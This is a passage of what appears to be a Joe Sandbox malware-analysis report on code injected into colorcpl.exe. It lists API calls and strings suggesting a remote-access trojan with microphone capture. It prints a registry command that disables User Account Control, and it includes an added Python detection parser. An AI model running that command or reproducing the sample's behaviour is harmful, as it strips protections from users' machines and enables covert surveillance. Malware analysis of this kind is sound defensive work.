• Instruction Fuzzy Hash: E1F0C23164322C6FE610FAA4BC49EBF3BACDB95A62F000056F9098A141DB298D4595E0
APIs
• RegisterClassExA.USER32(00000030), ref: 030AB310
• CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 030AB32B
• GetLastError.KERNEL32 ref: 030AB335
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• API ID: ClassCreateErrorLastRegisterWindow
• String ID: 0$MsgWindowClass
• API String ID: 2877667751-2410386613
• Opcode ID: 0e3882353627e1e0f7eb399730f985deb860ad2cb3f5f7241ce24bf4e79bbf4b
• Instruction ID: 2b50f196c1c6194ce3320c8ed8d509db84d5ca8dda2ef896ee80bee0d476c7e8
• Opcode Fuzzy Hash: 0e3882353627e1e0f7eb399730f985deb860ad2cb3f5f7241ce24bf4e79bbf4b
• Instruction Fuzzy Hash: 55015EB2D0121CAFDB10DFE5ECC49EFBBBCFB04254F40052AF910A6240E77549048BA0
APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,03101FFC), ref: 0309E547
• CloseHandle.KERNEL32(?,?,?,?,?,00000000,03101FFC), ref: 0309E556
• CloseHandle.KERNEL32(?,?,?,?,?,00000000,03101FFC), ref: 0309E55B
Strings
• C:\Windows\System32\cmd.exe, xrefs: 0309E542
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0309E53D
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
• Opcode ID: 3b3a826143a8d89ef10c8c51f4872d74a069067c9615c70075ec7f133bf9dcf4
• Instruction ID: b07bb6978ab5a4ddff8e5ace944a20e297fbac4e2ee6862fbabfa8e910ddbc60
• Opcode Fuzzy Hash: 3b3a826143a8d89ef10c8c51f4872d74a069067c9615c70075ec7f133bf9dcf4
• Instruction Fuzzy Hash: 45F06276E0129C7ACB20EAD7AC0DEDF7F3CEBC5B10F00001ABA14AA014D5756400CAB0
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,030D07EB,?,?,030D078B,?,030FB4F8,0000000C,030D08E2,?,00000002), ref: 030D085A
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 030D086D
• FreeLibrary.KERNEL32(00000000,?,?,?,030D07EB,?,?,030D078B,?,030FB4F8,0000000C,030D08E2,?,00000002,00000000), ref: 030D0890
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 889affaebbbee54f9e191c4be089816e4684ed7e38999941c115ddcc30742717
• Instruction ID: 395a2edf1142dff80272d1b49fa6c853120bd50f5116e7e47b74a05bc470952e
• Opcode Fuzzy Hash: 889affaebbbee54f9e191c4be089816e4684ed7e38999941c115ddcc30742717
• Instruction Fuzzy Hash: 40F04431B0221CBFCB15EFA4E849BAEBFF4DF14651F444169F809AA150DB359A40CA90
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,03101E90,03094E5A,00000001,?,00000000,03101E90,03094C88,00000000,?,?,?), ref: 03095100
• SetEvent.KERNEL32(?,?,00000000,03101E90,03094C88,00000000,?,?,?), ref: 0309510C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,03101E90,03094C88,00000000,?,?,?), ref: 03095117
• CloseHandle.KERNEL32(?,?,00000000,03101E90,03094C88,00000000,?,?,?), ref: 03095120
  • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
Strings
• Connection KeepAlive | Disabled, xrefs: 030950D9
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: Connection KeepAlive | Disabled
• API String ID: 2993684571-3818284553
• Opcode ID: 4c3e969a111a3911c4a610e2cdf9fa3f25ea457eeeb10e96bbc205254d9ca7aa
• Instruction ID: e0bf678a101250c48ab48995a83e4181822111c3541fb8eb63a286041758a7fa
• Opcode Fuzzy Hash: 4c3e969a111a3911c4a610e2cdf9fa3f25ea457eeeb10e96bbc205254d9ca7aa
• Instruction Fuzzy Hash: 4EF02B75A027047FFF11B7749C0996E7F9CAB53620F000D0EF8924A661C5699440D751
APIs
  • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 030A8DA8
• PlaySoundW.WINMM(00000000,00000000), ref: 030A8DB6
• Sleep.KERNEL32(00002710), ref: 030A8DBD
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 030A8DC6
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
• Opcode ID: 754f623124fa944fdbca557e3d6e99e57a099e59aa007c455f8b5ed5910064e5
• Instruction ID: 0e5426dfa56dfebeeb0dbc4edda121dda0454f6ace02fb2eda743118b3fa4e0e
• Opcode Fuzzy Hash: 754f623124fa944fdbca557e3d6e99e57a099e59aa007c455f8b5ed5910064e5
• Instruction Fuzzy Hash: 91E0122AB422583BE51473AA7D0FC6F2E2DDAD3A61701045EFA045F545DA55180186F2
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• Opcode ID: 3415ee55ed9505d1b3ab9b48190d5b8b33a73f9ef81cd93975c4e08b8992d4e4
• Instruction ID: 313f421c8dc53630d11e1b6d82759516785a3ed36ea63e41c4bcbebd91134f16
• Opcode Fuzzy Hash: 3415ee55ed9505d1b3ab9b48190d5b8b33a73f9ef81cd93975c4e08b8992d4e4
• Instruction Fuzzy Hash: 9B71F631D22296DBCB61DF94C8956FFFBB9EF41310F18066DE8116B180EB718941CBA1
APIs
  • Part of subcall function 030D3649: RtlAllocateHeap.NTDLL(00000000,030C3069,?,?,030C65E7,?,?,?,?,?,0309C88A,030C3069,?,?,?,?), ref: 030D367B
• _free.LIBCMT ref: 030D2318
• _free.LIBCMT ref: 030D232F
• _free.LIBCMT ref: 030D234E
• _free.LIBCMT ref: 030D2369
• _free.LIBCMT ref: 030D2380
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• API ID: _free$AllocateHeap
• API String ID: 3033488037-0
• Opcode ID: ee7281218bfeeb36143bd6dc934d9bd55be6553ea3d51147a5aac5d778c19fc2
• Instruction ID: f0285101ac5ba42a3c0a95912e88aabf5738fa876d7dfeee53ed6aa6f3de965f
• Opcode Fuzzy Hash: ee7281218bfeeb36143bd6dc934d9bd55be6553ea3d51147a5aac5d778c19fc2
• Instruction Fuzzy Hash: A951C576A02708AFDB61DF69CC41BAAB7F8EF49720F144999E809DB650E731E901CB50
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,030EC1E4), ref: 030D68FE
• WideCharToMultiByte.KERNEL32(00000000,00000000,030FF754,000000FF,00000000,0000003F,00000000,?,?), ref: 030D6976
• WideCharToMultiByte.KERNEL32(00000000,00000000,030FF7A8,000000FF,?,0000003F,00000000,?), ref: 030D69A3
• _free.LIBCMT ref: 030D68EC
  • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
  • Part of subcall function 030D3C92: GetLastError.KERNEL32(?,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?,?), ref: 030D3CBA
• _free.LIBCMT ref: 030D6AB8
Memory Dump Source
• Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
• Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• API String ID: 1286116820-0
• Opcode ID: a96d5b0b9666dcacbf3e43c29fa8ab43c71dfd93116c83baf6b61b4584d9b23a
• Instruction ID: 43b1147c82912ccd9ec06ba926dd7c588ad47daa8539ec5ee06bcfabd4436582
• Opcode Fuzzy Hash: a96d5b0b9666dcacbf3e43c29fa8ab43c71dfd93116c83baf6b61b4584d9b23a
• Instruction Fuzzy Hash: E751D77590231EEFCB10EFA9DC809AEF7FCEF41310B5402AAE4559B694E7369940CB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 4c4f48fbdf77350c5fe314ecaad07e633de2b7878cd5e24dc1898319db3719e0
                                                              • Instruction ID: fd8c860acacacf1b03e5cd71a08744582662fb1fab6bbf8ccdc56f2ecbf64bef
                                                              • Opcode Fuzzy Hash: 4c4f48fbdf77350c5fe314ecaad07e633de2b7878cd5e24dc1898319db3719e0
                                                              • Instruction Fuzzy Hash: 2041B236E02304AFDB18DF78C884A9DB7F6EF85710B1945A9EA55EF640DB31E901CB80
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(03101E78,00000000,?,?,00000000,00000000,030C988A,?,00000000,03101E78,00000001,?,?,00000001,030C988A), ref: 030DE359
                                                              • __alloca_probe_16.LIBCMT ref: 030DE391
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 030DE3E2
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,030C8C3F,?), ref: 030DE3F4
                                                              • __freea.LIBCMT ref: 030DE3FD
                                                                • Part of subcall function 030D3649: RtlAllocateHeap.NTDLL(00000000,030C3069,?,?,030C65E7,?,?,?,?,?,0309C88A,030C3069,?,?,?,?), ref: 030D367B
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                              • String ID:
                                                              • API String ID: 313313983-0
                                                              • Opcode ID: 0fb2fd09fb7647f5b0b965d4e1e67e8e02e9066c558a0b2f12216ef6780c2557
                                                              • Instruction ID: e2bbe777b9108692c4904123ccf3811bfdc45c686df0875b227a2f161f74d6ac
                                                              • Opcode Fuzzy Hash: 0fb2fd09fb7647f5b0b965d4e1e67e8e02e9066c558a0b2f12216ef6780c2557
                                                              • Instruction Fuzzy Hash: 88318D72A1231AABDF25DF69DC88DFE7BE5EF40610B084168EC05DE290E739D950CB94
                                                              APIs
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 03091BD9
                                                              • waveInOpen.WINMM(030FFAB0,000000FF,030FFA98,Function_00001CEB,00000000,00000000,00000024), ref: 03091C6F
                                                              • waveInPrepareHeader.WINMM(030FFA78,00000020), ref: 03091CC3
                                                              • waveInAddBuffer.WINMM(030FFA78,00000020), ref: 03091CD2
                                                              • waveInStart.WINMM ref: 03091CDE
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                              • String ID:
                                                              • API String ID: 1356121797-0
                                                              • Opcode ID: 0d19602e6f8d91825e5490605bb74e74f9fae19e18eb77aa73627bcd33fc9a16
                                                              • Instruction ID: 197b809cb23aa72a0cb5ec22ea035785c64cc77c5c055556a74bd70af535671e
                                                              • Opcode Fuzzy Hash: 0d19602e6f8d91825e5490605bb74e74f9fae19e18eb77aa73627bcd33fc9a16
                                                              • Instruction Fuzzy Hash: 4F214AF6603207AFD718FF25B81495A7BA5EB98F10700422AA205DBEA8DBBC4401DB04
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 030DC543
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 030DC566
                                                                • Part of subcall function 030D3649: RtlAllocateHeap.NTDLL(00000000,030C3069,?,?,030C65E7,?,?,?,?,?,0309C88A,030C3069,?,?,?,?), ref: 030D367B
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 030DC58C
                                                              • _free.LIBCMT ref: 030DC59F
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 030DC5AE
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 5146da218e0b25e975825ec037f09a3ba724ed638471fb6643b77df3aa8e3080
                                                              • Instruction ID: 0b14a51f5978dcd864803b0eaf3fe599846d2112c1581f853d9cb79c76ffb7ef
                                                              • Opcode Fuzzy Hash: 5146da218e0b25e975825ec037f09a3ba724ed638471fb6643b77df3aa8e3080
                                                              • Instruction Fuzzy Hash: CF01D8767037157F3721D6AB6C4CCBF6AEDCAC6EA03180169F904C6108DE659D41C5B0
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0309FBD5
                                                              • int.LIBCPMT ref: 0309FBE8
                                                                • Part of subcall function 0309CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0309CAFA
                                                                • Part of subcall function 0309CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0309CB14
                                                              • std::_Facet_Register.LIBCPMT ref: 0309FC28
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0309FC31
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0309FC4F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                              • String ID:
                                                              • API String ID: 2536120697-0
                                                              • Opcode ID: 48749681d6acca856660be0da7958483850db7c38e0d396f7a914b38dfc0ce57
                                                              • Instruction ID: 7c379e02b5e997e1146388a7cd18f277bd1f8a6eb93da49b9bc8bddf07ea979f
                                                              • Opcode Fuzzy Hash: 48749681d6acca856660be0da7958483850db7c38e0d396f7a914b38dfc0ce57
                                                              • Instruction Fuzzy Hash: CB11067A912319ABDF24FBA4D5048DEB7A8DF84260B14859BEC10EF250DE70DE42D7D0
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00000000,00000000,030C9A11,00000000,?,?,030C9A95,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 030D57AE
                                                              • _free.LIBCMT ref: 030D57E3
                                                              • _free.LIBCMT ref: 030D580A
                                                              • SetLastError.KERNEL32(00000000), ref: 030D5817
                                                              • SetLastError.KERNEL32(00000000), ref: 030D5820
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 2237fc242f810dba63741aa3e9fdc965915c17a1b2d1ff1c2ded4e29782abe85
                                                              • Instruction ID: 3e81b4561523ffd2b571c93164998a2a378ee30156b640974c4d5fee7bb0d220
                                                              • Opcode Fuzzy Hash: 2237fc242f810dba63741aa3e9fdc965915c17a1b2d1ff1c2ded4e29782abe85
                                                              • Instruction Fuzzy Hash: 4D01493A243B056BC312F538BC88E6F26DDDBC3A71B354064FC16AA140EF3988018731
                                                              APIs
                                                              • _free.LIBCMT ref: 030DDBB4
                                                                • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
                                                                • Part of subcall function 030D3C92: GetLastError.KERNEL32(?,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?,?), ref: 030D3CBA
                                                              • _free.LIBCMT ref: 030DDBC6
                                                              • _free.LIBCMT ref: 030DDBD8
                                                              • _free.LIBCMT ref: 030DDBEA
                                                              • _free.LIBCMT ref: 030DDBFC
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: e5f479ed867e8adfd287ec645889495a282beb6b2ea523057e7d13095bba3b77
                                                              • Instruction ID: 547d8d103ad0f9726b01a75fb204513746efc68871076ff90d2e6c8f2fb94654
                                                              • Opcode Fuzzy Hash: e5f479ed867e8adfd287ec645889495a282beb6b2ea523057e7d13095bba3b77
                                                              • Instruction Fuzzy Hash: C1F09036603314EF9660FA6DE589E6AF3DAFF407617699845F085DB900CF38F8808B61
                                                              APIs
                                                              • _free.LIBCMT ref: 030D1566
                                                                • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
                                                                • Part of subcall function 030D3C92: GetLastError.KERNEL32(?,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?,?), ref: 030D3CBA
                                                              • _free.LIBCMT ref: 030D1578
                                                              • _free.LIBCMT ref: 030D158B
                                                              • _free.LIBCMT ref: 030D159C
                                                              • _free.LIBCMT ref: 030D15AD
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 0ef2b81e105a104f0d560a1e49210758bbad6814b0ad9e697aaed95e205fdbed
                                                              • Instruction ID: 166a430fa9ff8e781216c596963dabe0d3510c6a48753aea9fef679b2969613b
                                                              • Opcode Fuzzy Hash: 0ef2b81e105a104f0d560a1e49210758bbad6814b0ad9e697aaed95e205fdbed
                                                              • Instruction Fuzzy Hash: 12F03AB99033218FC641FF24F8456493BE1F704B61306968AF4599AE68CF3E4942CFA5
                                                              APIs
                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 030A24AD
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 030A24DC
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 030A257C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Enum$InfoQueryValue
                                                              • String ID: [regsplt]
                                                              • API String ID: 3554306468-4262303796
                                                              • Opcode ID: a5514f0dd06119a18e7f6e3935953f1b6dee61b94da1feb7a1ddef2d9e1cf3c5
                                                              • Instruction ID: 9aba56421d944c49ee4b63219f6ae2f1bacd7f2f0267994e215640f043e573e5
                                                              • Opcode Fuzzy Hash: a5514f0dd06119a18e7f6e3935953f1b6dee61b94da1feb7a1ddef2d9e1cf3c5
                                                              • Instruction Fuzzy Hash: BB513F75A0121DAEEF14EBE4DC90EEFB7BCBF44200F100566E505AA191EF706B49DBA0
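                                                               Added example (not part of the Joe Sandbox report and not code from the analysed sample): a small Python parser for the "APIs" bullets in this report, with an ordered-sequence matcher that turns listings such as the waveInOpen / waveInPrepareHeader / waveInAddBuffer / waveInStart chain (microphone capture) and the RegQueryInfoKeyW / RegEnumKeyExW / RegEnumValueW chain (registry enumeration) into capability hits. The sample text and the rule table are built from the listings in this report; the rule names are labels chosen for the example. "Part of subcall function" lines are parsed but skipped by the matcher, because the report attributes those calls to a callee, not to the function being listed.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed sample in the layout of this report's "APIs" blocks. The call names and
# addresses are copied from the listings above; the order inside a function is what the
# matcher relies on. The last line is a callee ("Part of subcall function") entry.
SAMPLE_APIS = """\
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 03091BD9
• waveInOpen.WINMM(030FFAB0,000000FF,030FFA98,Function_00001CEB,00000000,00000000,00000024), ref: 03091C6F
• waveInPrepareHeader.WINMM(030FFA78,00000020), ref: 03091CC3
• waveInAddBuffer.WINMM(030FFA78,00000020), ref: 03091CD2
• waveInStart.WINMM ref: 03091CDE
• RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 030A24AD
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 030A24DC
• RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 030A257C
• GetLocalTime.KERNEL32(?,?,00000000), ref: 0309A0BE
• wsprintfW.USER32 ref: 0309A13F
• CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 03099EB7
  • Part of subcall function 030D3649: RtlAllocateHeap.NTDLL(00000000,030C3069), ref: 030D367B
"""

# One bullet: optional subcall prefix, Name.MODULE, optional "(args)", then "ref: <address>".
_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w:~@]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: str                    # address of the call site in the dumped image
    subcall_of: Optional[str]   # set when the report attributes the call to a callee


def parse_api_block(text: str):
    """Parse the bullet lines of an 'APIs' block into ApiCall records; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
    return calls


# Ordered API sequences that, seen in one function, indicate a capability. Each sequence is
# taken from a listing in this report; it is matched as a subsequence, so unrelated calls may
# sit between its members. The rule names are labels chosen for this example.
CAPABILITY_RULES = {
    "microphone_capture": ("waveInOpen", "waveInPrepareHeader", "waveInAddBuffer", "waveInStart"),
    "registry_enumeration": ("RegQueryInfoKeyW", "RegEnumKeyExW", "RegEnumValueW"),
    "timestamped_log_line": ("GetLocalTime", "wsprintfW"),
    "thread_spawn": ("CreateThread",),
}


def match_capabilities(calls, rules=CAPABILITY_RULES):
    """Return {rule: [call-site refs]} for every rule whose sequence occurs, in order, among
    the function's own calls. Subcall entries describe callees, so they are ignored: a shared
    helper that frees a buffer must not make every caller look like it does so itself."""
    direct = [c for c in calls if c.subcall_of is None]
    hits = {}
    for rule, seq in rules.items():
        refs, i = [], 0
        for call in direct:
            if i < len(seq) and call.name == seq[i]:
                refs.append(call.ref)
                i += 1
        if i == len(seq):
            hits[rule] = refs
    return hits


if __name__ == "__main__":
    for rule, refs in match_capabilities(parse_api_block(SAMPLE_APIS)).items():
        print(f"{rule:22s} {' -> '.join(refs)}")
```

                                                               Run against the text of one "APIs" block at a time: the ordering the matcher depends on only holds within a single function listing, and the returned refs give the call sites to jump to in the dumped image (the Memory Dump Source above gives its base, 03090000).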
                                                              APIs
                                                              • _strpbrk.LIBCMT ref: 030DB918
                                                              • _free.LIBCMT ref: 030DBA35
                                                                • Part of subcall function 030C9AA3: IsProcessorFeaturePresent.KERNEL32(00000017,030C9A75,?,?,?,00000000,?,00000000,?,?,030C9A95,00000000,00000000,00000000,00000000,00000000), ref: 030C9AA5
                                                                • Part of subcall function 030C9AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 030C9AC7
                                                                • Part of subcall function 030C9AA3: TerminateProcess.KERNEL32(00000000), ref: 030C9ACE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                              • String ID: *?$.
                                                              • API String ID: 2812119850-3972193922
